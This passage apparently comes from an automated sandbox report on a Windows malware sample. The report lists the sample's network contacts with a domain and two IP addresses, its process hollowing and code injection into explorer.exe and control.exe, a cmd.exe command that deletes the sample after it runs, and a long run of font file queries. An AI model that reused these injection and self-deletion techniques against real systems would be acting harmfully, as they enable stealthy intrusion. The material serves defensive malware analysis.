          Source: C:\Windows\explorer.exeDomain query: www.nhmingwei.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.208.173.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 148.72.177.185 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\56460021473877.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 2F0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\56460021473877.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\56460021473877.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\56460021473877.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\56460021473877.exeMemory written: C:\Users\user\Desktop\56460021473877.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\56460021473877.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\56460021473877.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\56460021473877.exeProcess created: C:\Users\user\Desktop\56460021473877.exe C:\Users\user\Desktop\56460021473877.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\56460021473877.exe'
          Source: explorer.exe, 00000004.00000000.735455957.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.695674691.0000000001080000.00000002.00020000.sdmp, control.exe, 00000008.00000002.940707527.0000000002EE0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.739998516.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000008.00000002.940707527.0000000002EE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.695674691.0000000001080000.00000002.00020000.sdmp, control.exe, 00000008.00000002.940707527.0000000002EE0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.695674691.0000000001080000.00000002.00020000.sdmp, control.exe, 00000008.00000002.940707527.0000000002EE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.743454584.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Users\user\Desktop\56460021473877.exe VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\56460021473877.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
